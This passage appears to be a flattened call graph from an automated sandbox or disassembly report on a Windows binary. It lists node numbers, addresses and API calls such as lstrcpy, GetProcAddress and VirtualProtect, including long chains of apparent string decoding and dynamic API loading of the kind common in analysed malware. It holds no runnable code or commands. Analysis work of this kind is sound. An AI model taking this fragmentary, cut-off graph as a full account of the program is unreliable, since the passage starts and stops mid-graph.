28851->28850 28853 5b03d0 lstrlen 28852->28853 28854 5b03c4 lstrcpy 28852->28854 28855 5b0407 28853->28855 28854->28853 28856 5b041b lstrcpy 28855->28856 28857 5b0427 28855->28857 28856->28857 29081 592d90 28857->29081 28865 5b0699 28866 5b1550 4 API calls 28865->28866 28867 5b06aa 28866->28867 28868 5b06dd 28867->28868 28869 5b06d5 lstrcpy 28867->28869 29837 5b7340 lstrlen 28868->29837 28869->28868 28871 5b06f1 28872 5b0722 28871->28872 28873 5b071a lstrcpy 28871->28873 28874 5b7340 3 API calls 28872->28874 28873->28872 28875 5b0741 28874->28875 28876 5b076f 28875->28876 28877 5b0767 lstrcpy 28875->28877 28878 5b7340 3 API calls 28876->28878 28877->28876 28879 5b0791 28878->28879 28880 5b07cb 28879->28880 28881 5b07c3 lstrcpy 28879->28881 29841 5b7210 28880->29841 28881->28880 28889 5b0811 30012 5a8d00 StrCmpCA 28889->30012 28891 5b081f 28892 5b7210 lstrcpy 28891->28892 28893 5b0857 28892->28893 28894 591410 8 API calls 28893->28894 28895 5b086a 28894->28895 30030 596000 80 API calls 28895->30030 28897 5b0870 30031 5a8240 10 API calls 28897->30031 28899 5b087e 28900 5b7210 lstrcpy 28899->28900 28901 5b08b6 28900->28901 28902 591410 8 API calls 28901->28902 28903 5b08c9 28902->28903 30032 596000 80 API calls 28903->30032 28905 5b08cf 30033 5a7f60 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 28905->30033 28907 5b08dd 28908 5b7210 lstrcpy 28907->28908 28909 5b0914 28908->28909 28910 591410 8 API calls 28909->28910 28911 5b0927 28910->28911 30034 596000 80 API calls 28911->30034 28913 5b092d 30035 5a80e0 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 28913->30035 28915 5b093b 28916 591410 8 API calls 28915->28916 28917 5b096a 28916->28917 28918 5b09ab lstrcpy 28917->28918 28919 5b09b3 28917->28919 28918->28919 30036 595570 8 API calls 28919->30036 28921 5b09b8 28922 591410 8 API calls 28921->28922 28923 5b0a0e 28922->28923 30037 5a7700 1357 API calls 28923->30037 28925 5b0a13 28926 5b7210 lstrcpy 28925->28926 28927 5b0a4e 28926->28927 28928 591410 8 API calls 28927->28928 28929 5b0a61 28928->28929 30038 596000 80 API calls 28929->30038 28931 5b0a67 30039 5a8470 7 API calls 28931->30039 28933 5b0a75 28934 591410 8 API calls 28933->28934 28935 5b0abf 28934->28935 30040 5923e0 230 API calls 28935->30040 28937 5b0aca 28938 5b0ada 28937->28938 28939 5b0b87 28937->28939 28943 5b0b1e 28938->28943 28944 5b0b16 lstrcpy 28938->28944 28940 5b0bb2 28939->28940 28941 5b0baa lstrcpy 28939->28941 28942 591410 8 API calls 28940->28942 28941->28940 28945 5b0bc5 28942->28945 28946 591410 8 API calls 28943->28946 28944->28943 30044 596000 80 API calls 28945->30044 28948 5b0b31 28946->28948 30041 596000 80 API calls 28948->30041 28949 5b0bcb 30045 5ac940 70 API calls 28949->30045 28952 5b0b37 30042 5a8640 47 API calls 28952->30042 28953 5b0b7f 28956 5b0c09 28953->28956 28959 591410 8 API calls 28953->28959 28955 5b0b42 28957 591410 8 API calls 28955->28957 28960 5b0c2d 28956->28960 28964 591410 8 API calls 28956->28964 28958 5b0b74 28957->28958 30043 5ad1f0 118 API calls 28958->30043 28963 5b0bf2 28959->28963 28962 5b0c51 28960->28962 28966 591410 8 API calls 28960->28966 28968 5b0c75 28962->28968 28973 591410 8 API calls 28962->28973 30046 5ad8c0 103 API calls __setmbcp_nolock 28963->30046 28965 5b0c28 28964->28965 30048 5ae0c0 149 API calls 28965->30048 28971 5b0c4c 28966->28971 28969 5b0c99 28968->28969 28974 591410 8 API calls 28968->28974 28975 5b0cbd 28969->28975 28980 591410 8 API calls 28969->28980 30049 5ae640 108 API calls 28971->30049 28972 5b0bf7 28977 591410 8 API calls 28972->28977 28978 5b0c70 28973->28978 28979 5b0c94 28974->28979 28982 5b0ce1 28975->28982 28988 591410 8 API calls 28975->28988 28981 5b0c04 28977->28981 30050 5ae880 120 API calls 28978->30050 30051 5aeb40 110 API calls 28979->30051 28986 5b0cb8 28980->28986 30047 5aee10 97 API calls 28981->30047 28984 5b0d05 28982->28984 28989 591410 8 API calls 28982->28989 28995 5b0dbd 28984->28995 28997 5b0d15 28984->28997 30052 597b10 153 API calls 28986->30052 28991 5b0cdc 28988->28991 28992 5b0d00 28989->28992 30053 5aecd0 108 API calls 28991->30053 30054 5b41c0 91 API calls 28992->30054 28996 5b0de8 28995->28996 28998 5b0de0 lstrcpy 28995->28998 29001 591410 8 API calls 28996->29001 28999 5b0d4c lstrcpy 28997->28999 29000 5b0d54 28997->29000 28998->28996 28999->29000 29002 591410 8 API calls 29000->29002 29003 5b0dfb 29001->29003 29004 5b0d67 29002->29004 30058 596000 80 API calls 29003->30058 30055 596000 80 API calls 29004->30055 29007 5b0e01 30059 5ac940 70 API calls 29007->30059 29008 5b0d6d 30056 5a8640 47 API calls 29008->30056 29011 5b0d78 29012 591410 8 API calls 29011->29012 29013 5b0daa 29012->29013 30057 5ad1f0 118 API calls 29013->30057 29014 5b0db5 29016 5b0e38 29014->29016 29017 5b0e30 lstrcpy 29014->29017 29018 591410 8 API calls 29016->29018 29017->29016 29019 5b0e4b 29018->29019 30060 596000 80 API calls 29019->30060 29021 5b0e57 29023 5b0e73 29021->29023 30061 5b1640 12 API calls 29021->30061 29023->28717 29024->28687 29026 594996 RtlAllocateHeap 29025->29026 29029 5949d4 VirtualProtect 29026->29029 29029->28720 29031 5b180e 29030->29031 29032 5b1829 lstrcpy 29031->29032 29033 5b1835 lstrlen 29031->29033 29032->29033 29034 5b1853 29033->29034 29035 5b1865 lstrcpy lstrcat 29034->29035 29036 5b1878 29034->29036 29035->29036 29037 5b18a7 29036->29037 29038 5b189f lstrcpy 29036->29038 29039 5b18ae lstrlen 29037->29039 29038->29037 29040 5b18c6 29039->29040 29041 5b18d2 lstrcpy lstrcat 29040->29041 29042 5b18e6 29040->29042 29041->29042 29043 5b1915 29042->29043 29044 5b190d lstrcpy 29042->29044 29045 5b191c lstrlen 29043->29045 29044->29043 29046 5b1938 29045->29046 29047 5b194a lstrcpy lstrcat 29046->29047 29048 5b195d 29046->29048 29047->29048 29049 5b198c 29048->29049 29050 5b1984 lstrcpy 29048->29050 29051 5b1993 lstrlen 29049->29051 29050->29049 29052 5b19ab 29051->29052 29053 5b19b7 lstrcpy lstrcat 29052->29053 29054 5b19cb 29052->29054 29053->29054 29055 5b19fa 29054->29055 29056 5b19f2 lstrcpy 29054->29056 29057 5b1a01 lstrlen 29055->29057 29056->29055 29058 5b1a1d 29057->29058 29059 5b1a2f lstrcpy lstrcat 29058->29059 29060 5b1a42 29058->29060 29059->29060 29061 5b1a71 29060->29061 29062 5b1a69 lstrcpy 29060->29062 29063 5b1a78 lstrlen 29061->29063 29062->29061 29065 5b1a94 29063->29065 29064 5b1ab9 29067 5b1ae8 29064->29067 29068 5b1ae0 lstrcpy 29064->29068 29065->29064 29066 5b1aa6 lstrcpy lstrcat 29065->29066 29066->29064 29067->28824 29068->29067 29070 592934 SystemTimeToFileTime SystemTimeToFileTime 29069->29070 29070->28827 29070->28828 29072 5b155f 29071->29072 29073 5b157f lstrcpy 29072->29073 29074 5b1587 29072->29074 29073->29074 29075 5b15b7 lstrcpy 29074->29075 29076 5b15bf 29074->29076 29075->29076 29077 5b15ef lstrcpy 29076->29077 29078 5b15f7 29076->29078 29077->29078 29079 5b031c lstrlen 29078->29079 29080 5b1627 lstrcpy 29078->29080 29079->28846 29080->29079 29082 594980 2 API calls 29081->29082 29083 592da2 29082->29083 29084 594980 2 API calls 29083->29084 29085 592dc0 29084->29085 29086 594980 2 API calls 29085->29086 29087 592dd6 29086->29087 29088 594980 2 API calls 29087->29088 29089 592deb 29088->29089 29090 594980 2 API calls 29089->29090 29091 592e0c 29090->29091 29092 594980 2 API calls 29091->29092 29093 592e21 29092->29093 29094 594980 2 API calls 29093->29094 29095 592e39 29094->29095 29096 594980 2 API calls 29095->29096 29097 592e5a 29096->29097 29098 594980 2 API calls 29097->29098 29099 592e6f 29098->29099 29100 594980 2 API calls 29099->29100 29101 592e85 29100->29101 29102 594980 2 API calls 29101->29102 29103 592e9b 29102->29103 29104 594980 2 API calls 29103->29104 29105 592eb1 29104->29105 29106 594980 2 API calls 29105->29106 29107 592eca 29106->29107 29108 594980 2 API calls 29107->29108 29109 592ee0 29108->29109 29110 594980 2 API calls 29109->29110 29111 592ef6 29110->29111 29112 594980 2 API calls 29111->29112 29113 592f0c 29112->29113 29114 594980 2 API calls 29113->29114 29115 592f22 29114->29115 29116 594980 2 API calls 29115->29116 29117 592f38 29116->29117 29118 594980 2 API calls 29117->29118 29119 592f51 29118->29119 29120 594980 2 API calls 29119->29120 29121 592f67 29120->29121 29122 594980 2 API calls 29121->29122 29123 592f7d 29122->29123 29124 594980 2 API calls 29123->29124 29125 592f93 29124->29125 29126 594980 2 API calls 29125->29126 29127 592fa9 29126->29127 29128 594980 2 API calls 29127->29128 29129 592fbf 29128->29129 29130 594980 2 API calls 29129->29130 29131 592fd8 29130->29131 29132 594980 2 API calls 29131->29132 29133 592fee 29132->29133 29134 594980 2 API calls 29133->29134 29135 593004 29134->29135 29136 594980 2 API calls 29135->29136 29137 59301a 29136->29137 29138 594980 2 API calls 29137->29138 29139 593030 29138->29139 29140 594980 2 API calls 29139->29140 29141 593046 29140->29141 29142 594980 2 API calls 29141->29142 29143 59305f 29142->29143 29144 594980 2 API calls 29143->29144 29145 593075 29144->29145 29146 594980 2 API calls 29145->29146 29147 59308b 29146->29147 29148 594980 2 API calls 29147->29148 29149 5930a1 29148->29149 29150 594980 2 API calls 29149->29150 29151 5930b7 29150->29151 29152 594980 2 API calls 29151->29152 29153 5930cd 29152->29153 29154 594980 2 API calls 29153->29154 29155 5930e6 29154->29155 29156 594980 2 API calls 29155->29156 29157 5930fc 29156->29157 29158 594980 2 API calls 29157->29158 29159 593112 29158->29159 29160 594980 2 API calls 29159->29160 29161 593128 29160->29161 29162 594980 2 API calls 29161->29162 29163 59313e 29162->29163 29164 594980 2 API calls 29163->29164 29165 593154 29164->29165 29166 594980 2 API calls 29165->29166 29167 59316d 29166->29167 29168 594980 2 API calls 29167->29168 29169 593183 29168->29169 29170 594980 2 API calls 29169->29170 29171 593199 29170->29171 29172 594980 2 API calls 29171->29172 29173 5931af 29172->29173 29174 594980 2 API calls 29173->29174 29175 5931c5 29174->29175 29176 594980 2 API calls 29175->29176 29177 5931db 29176->29177 29178 594980 2 API calls 29177->29178 29179 5931f4 29178->29179 29180 594980 2 API calls 29179->29180 29181 59320a 29180->29181 29182 594980 2 API calls 29181->29182 29183 593220 29182->29183 29184 594980 2 API calls 29183->29184 29185 593236 29184->29185 29186 594980 2 API calls 29185->29186 29187 59324c 29186->29187 29188 594980 2 API calls 29187->29188 29189 593262 29188->29189 29190 594980 2 API calls 29189->29190 29191 59327b 29190->29191 29192 594980 2 API calls 29191->29192 29193 593291 29192->29193 29194 594980 2 API calls 29193->29194 29195 5932a7 29194->29195 29196 594980 2 API calls 29195->29196 29197 5932bd 29196->29197 29198 594980 2 API calls 29197->29198 29199 5932d3 29198->29199 29200 594980 2 API calls 29199->29200 29201 5932e9 29200->29201 29202 594980 2 API calls 29201->29202 29203 593302 29202->29203 29204 594980 2 API calls 29203->29204 29205 593318 29204->29205 29206 594980 2 API calls 29205->29206 29207 59332e 29206->29207 29208 594980 2 API calls 29207->29208 29209 593344 29208->29209 29210 594980 2 API calls 29209->29210 29211 59335a 29210->29211 29212 594980 2 API calls 29211->29212 29213 593370 29212->29213 29214 594980 2 API calls 29213->29214 29215 593389 29214->29215 29216 594980 2 API calls 29215->29216 29217 59339f 29216->29217 29218 594980 2 API calls 29217->29218 29219 5933b5 29218->29219 29220 594980 2 API calls 29219->29220 29221 5933cb 29220->29221 29222 594980 2 API calls 29221->29222 29223 5933e1 29222->29223 29224 594980 2 API calls 29223->29224 29225 5933f7 29224->29225 29226 594980 2 API calls 29225->29226 29227 593410 29226->29227 29228 594980 2 API calls 29227->29228 29229 593426 29228->29229 29230 594980 2 API calls 29229->29230 29231 59343c 29230->29231 29232 594980 2 API calls 29231->29232 29233 593452 29232->29233 29234 594980 2 API calls 29233->29234 29235 593468 29234->29235 29236 594980 2 API calls 29235->29236 29237 59347e 29236->29237 29238 594980 2 API calls 29237->29238 29239 593497 29238->29239 29240 594980 2 API calls 29239->29240 29241 5934ad 29240->29241 29242 594980 2 API calls 29241->29242 29243 5934c3 29242->29243 29244 594980 2 API calls 29243->29244 29245 5934d9 29244->29245 29246 594980 2 API calls 29245->29246 29247 5934ef 29246->29247 29248 594980 2 API calls 29247->29248 29249 593505 29248->29249 29250 594980 2 API calls 29249->29250 29251 59351e 29250->29251 29252 594980 2 API calls 29251->29252 29253 593534 29252->29253 29254 594980 2 API calls 29253->29254 29255 59354a 29254->29255 29256 594980 2 API calls 29255->29256 29257 593560 29256->29257 29258 594980 2 API calls 29257->29258 29259 593576 29258->29259 29260 594980 2 API calls 29259->29260 29261 59358c 29260->29261 29262 594980 2 API calls 29261->29262 29263 5935a5 29262->29263 29264 594980 2 API calls 29263->29264 29265 5935bb 29264->29265 29266 594980 2 API calls 29265->29266 29267 5935d1 29266->29267 29268 594980 2 API calls 29267->29268 29269 5935e7 29268->29269 29270 594980 2 API calls 29269->29270 29271 5935fd 29270->29271 29272 594980 2 API calls 29271->29272 29273 593613 29272->29273 29274 594980 2 API calls 29273->29274 29275 59362c 29274->29275 29276 594980 2 API calls 29275->29276 29277 593642 29276->29277 29278 594980 2 API calls 29277->29278 29279 593658 29278->29279 29280 594980 2 API calls 29279->29280 29281 59366e 29280->29281 29282 594980 2 API calls 29281->29282 29283 593684 29282->29283 29284 594980 2 API calls 29283->29284 29285 59369a 29284->29285 29286 594980 2 API calls 29285->29286 29287 5936b3 29286->29287 29288 594980 2 API calls 29287->29288 29289 5936c9 29288->29289 29290 594980 2 API calls 29289->29290 29291 5936df 29290->29291 29292 594980 2 API calls 29291->29292 29293 5936f5 29292->29293 29294 594980 2 API calls 29293->29294 29295 59370b 29294->29295 29296 594980 2 API calls 29295->29296 29297 593721 29296->29297 29298 594980 2 API calls 29297->29298 29299 59373a 29298->29299 29300 594980 2 API calls 29299->29300 29301 593750 29300->29301 29302 594980 2 API calls 29301->29302 29303 593766 29302->29303 29304 594980 2 API calls 29303->29304 29305 59377c 29304->29305 29306 594980 2 API calls 29305->29306 29307 593792 29306->29307 29308 594980 2 API calls 29307->29308 29309 5937a8 29308->29309 29310 594980 2 API calls 29309->29310 29311 5937c1 29310->29311 29312 594980 2 API calls 29311->29312 29313 5937d7 29312->29313 29314 594980 2 API calls 29313->29314 29315 5937ed 29314->29315 29316 594980 2 API calls 29315->29316 29317 593803 29316->29317 29318 594980 2 API calls 29317->29318 29319 593819 29318->29319 29320 594980 2 API calls 29319->29320 29321 59382f 29320->29321 29322 594980 2 API calls 29321->29322 29323 593848 29322->29323 29324 594980 2 API calls 29323->29324 29325 59385e 29324->29325 29326 594980 2 API calls 29325->29326 29327 593874 29326->29327 29328 594980 2 API calls 29327->29328 29329 59388a 29328->29329 29330 594980 2 API calls 29329->29330 29331 5938a0 29330->29331 29332 594980 2 API calls 29331->29332 29333 5938b6 29332->29333 29334 594980 2 API calls 29333->29334 29335 5938cf 29334->29335 29336 594980 2 API calls 29335->29336 29337 5938e5 29336->29337 29338 594980 2 API calls 29337->29338 29339 5938fb 29338->29339 29340 594980 2 API calls 29339->29340 29341 593911 29340->29341 29342 594980 2 API calls 29341->29342 29343 593927 29342->29343 29344 594980 2 API calls 29343->29344 29345 59393d 29344->29345 29346 594980 2 API calls 29345->29346 29347 593956 29346->29347 29348 594980 2 API calls 29347->29348 29349 59396c 29348->29349 29350 594980 2 API calls 29349->29350 29351 593982 29350->29351 29352 594980 2 API calls 29351->29352 29353 593998 29352->29353 29354 594980 2 API calls 29353->29354 29355 5939ae 29354->29355 29356 594980 2 API calls 29355->29356 29357 5939c4 29356->29357 29358 594980 2 API calls 29357->29358 29359 5939dd 29358->29359 29360 594980 2 API calls 29359->29360 29361 5939f3 29360->29361 29362 594980 2 API calls 29361->29362 29363 593a09 29362->29363 29364 594980 2 API calls 29363->29364 29365 593a1f 29364->29365 29366 594980 2 API calls 29365->29366 29367 593a35 29366->29367 29368 594980 2 API calls 29367->29368 29369 593a4b 29368->29369 29370 594980 2 API calls 29369->29370 29371 593a64 29370->29371 29372 594980 2 API calls 29371->29372 29373 593a7a 29372->29373 29374 594980 2 API calls 29373->29374 29375 593a90 29374->29375 29376 594980 2 API calls 29375->29376 29377 593aa6 29376->29377 29378 594980 2 API calls 29377->29378 29379 593abc 29378->29379 29380 594980 2 API calls 29379->29380 29381 593ad2 29380->29381 29382 594980 2 API calls 29381->29382 29383 593aeb 29382->29383 29384 594980 2 API calls 29383->29384 29385 593b01 29384->29385 29386 594980 2 API calls 29385->29386 29387 593b17 29386->29387 29388 594980 2 API calls 29387->29388 29389 593b2d 29388->29389 29390 594980 2 API calls 29389->29390 29391 593b43 29390->29391 29392 594980 2 API calls 29391->29392 29393 593b59 29392->29393 29394 594980 2 API calls 29393->29394 29395 593b72 29394->29395 29396 594980 2 API calls 29395->29396 29397 593b88 29396->29397 29398 594980 2 API calls 29397->29398 29399 593b9e 29398->29399 29400 594980 2 API calls 29399->29400 29401 593bb4 29400->29401 29402 594980 2 API calls 29401->29402 29403 593bca 29402->29403 29404 594980 2 API calls 29403->29404 29405 593be0 29404->29405 29406 594980 2 API calls 29405->29406 29407 593bf9 29406->29407 29408 594980 2 API calls 29407->29408 29409 593c0f 29408->29409 29410 594980 2 API calls 29409->29410 29411 593c25 29410->29411 29412 594980 2 API calls 29411->29412 29413 593c3b 29412->29413 29414 594980 2 API calls 29413->29414 29415 593c51 29414->29415 29416 594980 2 API calls 29415->29416 29417 593c67 29416->29417 29418 594980 2 API calls 29417->29418 29419 593c80 29418->29419 29420 594980 2 API calls 29419->29420 29421 593c96 29420->29421 29422 594980 2 API calls 29421->29422 29423 593cac 29422->29423 29424 594980 2 API calls 29423->29424 29425 593cc2 29424->29425 29426 594980 2 API calls 29425->29426 29427 593cd8 29426->29427 29428 594980 2 API calls 29427->29428 29429 593cee 29428->29429 29430 594980 2 API calls 29429->29430 29431 593d07 29430->29431 29432 594980 2 API calls 29431->29432 29433 593d1d 29432->29433 29434 594980 2 API calls 29433->29434 29435 593d33 29434->29435 29436 594980 2 API calls 29435->29436 29437 593d49 29436->29437 29438 594980 2 API calls 29437->29438 29439 593d5f 29438->29439 29440 594980 2 API calls 29439->29440 29441 593d75 29440->29441 29442 594980 2 API calls 29441->29442 29443 593d8e 29442->29443 29444 594980 2 API calls 29443->29444 29445 593da4 29444->29445 29446 594980 2 API calls 29445->29446 29447 593dba 29446->29447 29448 594980 2 API calls 29447->29448 29449 593dd0 29448->29449 29450 594980 2 API calls 29449->29450 29451 593de6 29450->29451 29452 594980 2 API calls 29451->29452 29453 593dfc 29452->29453 29454 594980 2 API calls 29453->29454 29455 593e15 29454->29455 29456 594980 2 API calls 29455->29456 29457 593e2b 29456->29457 29458 594980 2 API calls 29457->29458 29459 593e41 29458->29459 29460 594980 2 API calls 29459->29460 29461 593e57 29460->29461 29462 594980 2 API calls 29461->29462 29463 593e6d 29462->29463 29464 594980 2 API calls 29463->29464 29465 593e83 29464->29465 29466 594980 2 API calls 29465->29466 29467 593e9c 29466->29467 29468 594980 2 API calls 29467->29468 29469 593eb2 29468->29469 29470 594980 2 API calls 29469->29470 29471 593ec8 29470->29471 29472 594980 2 API calls 29471->29472 29473 593ede 29472->29473 29474 594980 2 API calls 29473->29474 29475 593ef4 29474->29475 29476 594980 2 API calls 29475->29476 29477 593f0a 29476->29477 29478 594980 2 API calls 29477->29478 29479 593f23 29478->29479 29480 594980 2 API calls 29479->29480 29481 593f39 29480->29481 29482 594980 2 API calls 29481->29482 29483 593f4f 29482->29483 29484 594980 2 API calls 29483->29484 29485 593f65 29484->29485 29486 594980 2 API calls 29485->29486 29487 593f7b 29486->29487 29488 594980 2 API calls 29487->29488 29489 593f91 29488->29489 29490 594980 2 API calls 29489->29490 29491 593faa 29490->29491 29492 594980 2 API calls 29491->29492 29493 593fc0 29492->29493 29494 594980 2 API calls 29493->29494 29495 593fd6 29494->29495 29496 594980 2 API calls 29495->29496 29497 593fec 29496->29497 29498 594980 2 API calls 29497->29498 29499 594002 29498->29499 29500 594980 2 API calls 29499->29500 29501 594018 29500->29501 29502 594980 2 API calls 29501->29502 29503 594031 29502->29503 29504 594980 2 API calls 29503->29504 29505 594047 29504->29505 29506 594980 2 API calls 29505->29506 29507 59405d 29506->29507 29508 594980 2 API calls 29507->29508 29509 594073 29508->29509 29510 594980 2 API calls 29509->29510 29511 594089 29510->29511 29512 594980 2 API calls 29511->29512 29513 59409f 29512->29513 29514 594980 2 API calls 29513->29514 29515 5940b8 29514->29515 29516 594980 2 API calls 29515->29516 29517 5940ce 29516->29517 29518 594980 2 API calls 29517->29518 29519 5940e4 29518->29519 29520 594980 2 API calls 29519->29520 29521 5940fa 29520->29521 29522 594980 2 API calls 29521->29522 29523 594110 29522->29523 29524 594980 2 API calls 29523->29524 29525 594126 29524->29525 29526 594980 2 API calls 29525->29526 29527 59413f 29526->29527 29528 594980 2 API calls 29527->29528 29529 594155 29528->29529 29530 594980 2 API calls 29529->29530 29531 59416b 29530->29531 29532 594980 2 API calls 29531->29532 29533 594181 29532->29533 29534 594980 2 API calls 29533->29534 29535 594197 29534->29535 29536 594980 2 API calls 29535->29536 29537 5941ad 29536->29537 29538 594980 2 API calls 29537->29538 29539 5941c6 29538->29539 29540 594980 2 API calls 29539->29540 29541 5941dc 29540->29541 29542 594980 2 API calls 29541->29542 29543 5941f2 29542->29543 29544 594980 2 API calls 29543->29544 29545 594208 29544->29545 29546 594980 2 API calls 29545->29546 29547 59421e 29546->29547 29548 594980 2 API calls 29547->29548 29549 594234 29548->29549 29550 594980 2 API calls 29549->29550 29551 59424d 29550->29551 29552 594980 2 API calls 29551->29552 29553 594263 29552->29553 29554 594980 2 API calls 29553->29554 29555 594279 29554->29555 29556 594980 2 API calls 29555->29556 29557 59428f 29556->29557 29558 594980 2 API calls 29557->29558 29559 5942a5 29558->29559 29560 594980 2 API calls 29559->29560 29561 5942bb 29560->29561 29562 594980 2 API calls 29561->29562 29563 5942d4 29562->29563 29564 594980 2 API calls 29563->29564 29565 5942ea 29564->29565 29566 594980 2 API calls 29565->29566 29567 594300 29566->29567 29568 594980 2 API calls 29567->29568 29569 594316 29568->29569 29570 594980 2 API calls 29569->29570 29571 59432c 29570->29571 29572 594980 2 API calls 29571->29572 29573 594342 29572->29573 29574 594980 2 API calls 29573->29574 29575 59435b 29574->29575 29576 594980 2 API calls 29575->29576 29577 594371 29576->29577 29578 594980 2 API calls 29577->29578 29579 594387 29578->29579 29580 594980 2 API calls 29579->29580 29581 59439d 29580->29581 29582 594980 2 API calls 29581->29582 29583 5943b3 29582->29583 29584 594980 2 API calls 29583->29584 29585 5943c9 29584->29585 29586 594980 2 API calls 29585->29586 29587 5943e2 29586->29587 29588 594980 2 API calls 29587->29588 29589 5943f8 29588->29589 29590 594980 2 API calls 29589->29590 29591 59440e 29590->29591 29592 594980 2 API calls 29591->29592 29593 594424 29592->29593 29594 594980 2 API calls 29593->29594 29595 59443a 29594->29595 29596 594980 2 API calls 29595->29596 29597 594450 29596->29597 29598 594980 2 API calls 29597->29598 29599 594469 29598->29599 29600 594980 2 API calls 29599->29600 29601 59447f 29600->29601 29602 594980 2 API calls 29601->29602 29603 594495 29602->29603 29604 594980 2 API calls 29603->29604 29605 5944ab 29604->29605 29606 594980 2 API calls 29605->29606 29607 5944c1 29606->29607 29608 594980 2 API calls 29607->29608 29609 5944d7 29608->29609 29610 594980 2 API calls 29609->29610 29611 5944f0 29610->29611 29612 594980 2 API calls 29611->29612 29613 594506 29612->29613 29614 594980 2 API calls 29613->29614 29615 59451c 29614->29615 29616 594980 2 API calls 29615->29616 29617 594532 29616->29617 29618 594980 2 API calls 29617->29618 29619 594548 29618->29619 29620 594980 2 API calls 29619->29620 29621 59455e 29620->29621 29622 594980 2 API calls 29621->29622 29623 594577 29622->29623 29624 594980 2 API calls 29623->29624 29625 59458d 29624->29625 29626 594980 2 API calls 29625->29626 29627 5945a3 29626->29627 29628 594980 2 API calls 29627->29628 29629 5945b9 29628->29629 29630 594980 2 API calls 29629->29630 29631 5945cf 29630->29631 29632 594980 2 API calls 29631->29632 29633 5945e5 29632->29633 29634 594980 2 API calls 29633->29634 29635 5945fe 29634->29635 29636 594980 2 API calls 29635->29636 29637 594614 29636->29637 29638 594980 2 API calls 29637->29638 29639 59462a 29638->29639 29640 594980 2 API calls 29639->29640 29641 594640 29640->29641 29642 594980 2 API calls 29641->29642 29643 594656 29642->29643 29644 594980 2 API calls 29643->29644 29645 59466c 29644->29645 29646 594980 2 API calls 29645->29646 29647 594685 29646->29647 29648 594980 2 API calls 29647->29648 29649 59469b 29648->29649 29650 594980 2 API calls 29649->29650 29651 5946b1 29650->29651 29652 594980 2 API calls 29651->29652 29653 5946c7 29652->29653 29654 594980 2 API calls 29653->29654 29655 5946dd 29654->29655 29656 594980 2 API calls 29655->29656 29657 5946f3 29656->29657 29658 594980 2 API calls 29657->29658 29659 59470c 29658->29659 29660 594980 2 API calls 29659->29660 29661 594722 29660->29661 29662 594980 2 API calls 29661->29662 29663 594738 29662->29663 29664 594980 2 API calls 29663->29664 29665 59474e 29664->29665 29666 594980 2 API calls 29665->29666 29667 594764 29666->29667 29668 594980 2 API calls 29667->29668 29669 59477a 29668->29669 29670 594980 2 API calls 29669->29670 29671 594793 29670->29671 29672 594980 2 API calls 29671->29672 29673 5947a9 29672->29673 29674 594980 2 API calls 29673->29674 29675 5947bf 29674->29675 29676 594980 2 API calls 29675->29676 29677 5947d5 29676->29677 29678 594980 2 API calls 29677->29678 29679 5947eb 29678->29679 29680 594980 2 API calls 29679->29680 29681 594801 29680->29681 29682 594980 2 API calls 29681->29682 29683 59481a 29682->29683 29684 594980 2 API calls 29683->29684 29685 594830 29684->29685 29686 594980 2 API calls 29685->29686 29687 594846 29686->29687 29688 594980 2 API calls 29687->29688 29689 59485c 29688->29689 29690 594980 2 API calls 29689->29690 29691 594872 29690->29691 29692 594980 2 API calls 29691->29692 29693 594888 29692->29693 29694 594980 2 API calls 29693->29694 29695 5948a1 29694->29695 29696 594980 2 API calls 29695->29696 29697 5948b7 29696->29697 29698 594980 2 API calls 29697->29698 29699 5948cd 29698->29699 29700 594980 2 API calls 29699->29700 29701 5948e3 29700->29701 29702 594980 2 API calls 29701->29702 29703 5948f9 29702->29703 29704 594980 2 API calls 29703->29704 29705 59490f 29704->29705 29706 594980 2 API calls 29705->29706 29707 594928 29706->29707 29708 594980 2 API calls 29707->29708 29709 59493e 29708->29709 29710 594980 2 API calls 29709->29710 29711 594954 29710->29711 29712 594980 2 API calls 29711->29712 29713 59496a 29712->29713 29714 5b6710 29713->29714 29715 5b6b2e 8 API calls 29714->29715 29716 5b671d 43 API calls 29714->29716 29717 5b6c38 29715->29717 29718 5b6bc4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29715->29718 29716->29715 29719 5b6d02 29717->29719 29720 5b6c45 8 API calls 29717->29720 29718->29717 29721 5b6d0b GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29719->29721 29722 5b6d7f 29719->29722 29720->29719 29721->29722 29723 5b6e19 29722->29723 29724 5b6d8c 6 API calls 29722->29724 29725 5b6f40 29723->29725 29726 5b6e26 12 API calls 29723->29726 29724->29723 29727 5b6f49 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29725->29727 29728 5b6fbd 29725->29728 29726->29725 29727->29728 29729 5b6ff1 29728->29729 29730 5b6fc6 GetProcAddress GetProcAddress 29728->29730 29731 5b6ffa GetProcAddress GetProcAddress 29729->29731 29732 5b7025 29729->29732 29730->29729 29731->29732 29733 5b711d 29732->29733 29734 5b7032 10 API calls 29732->29734 29735 5b7182 29733->29735 29736 5b7126 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29733->29736 29734->29733 29737 5b718b GetProcAddress 29735->29737 29738 5b719e 29735->29738 29736->29735 29737->29738 29739 5b067a 29738->29739 29740 5b71a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29738->29740 29741 591410 29739->29741 29740->29739 30062 591510 29741->30062 29743 59141b 29744 591435 lstrcpy 29743->29744 29745 59143d 29743->29745 29744->29745 29746 591457 lstrcpy 29745->29746 29747 59145f 29745->29747 29746->29747 29748 591479 lstrcpy 29747->29748 29750 591481 29747->29750 29748->29750 29749 5914e5 29752 5af300 lstrlen 29749->29752 29750->29749 29751 5914dd lstrcpy 29750->29751 29751->29749 29753 5af33e 29752->29753 29754 5af352 lstrlen 29753->29754 29755 5af346 lstrcpy 29753->29755 29756 5af363 29754->29756 29755->29754 29757 5af36b lstrcpy 29756->29757 29758 5af377 lstrlen 29756->29758 29757->29758 29759 5af388 29758->29759 29760 5af390 lstrcpy 29759->29760 29761 5af39c 29759->29761 29760->29761 29762 5af3b8 lstrcpy 29761->29762 29763 5af3c4 29761->29763 29762->29763 29764 5af3e6 lstrcpy 29763->29764 29765 5af3f2 29763->29765 29764->29765 29766 5af41c lstrcpy 29765->29766 29767 5af428 29765->29767 29766->29767 29768 5af44e lstrcpy 29767->29768 29820 5af460 29767->29820 29768->29820 29769 5af46c lstrlen 29769->29820 29770 5af626 lstrcpy 29770->29820 29771 5af504 lstrcpy 29771->29820 29772 5af529 lstrcpy 29772->29820 29773 5af656 